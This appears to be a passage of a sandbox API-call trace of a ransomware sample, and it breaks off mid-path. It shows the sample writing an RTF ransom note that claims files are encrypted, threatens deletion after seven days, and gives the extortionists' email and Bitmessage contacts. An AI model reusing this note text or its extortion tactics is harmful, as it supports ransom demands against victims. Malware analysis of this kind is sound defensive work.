{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.758] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.758] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.758] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.758] CloseHandle (hObject=0x294) returned 1 [0297.758] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: 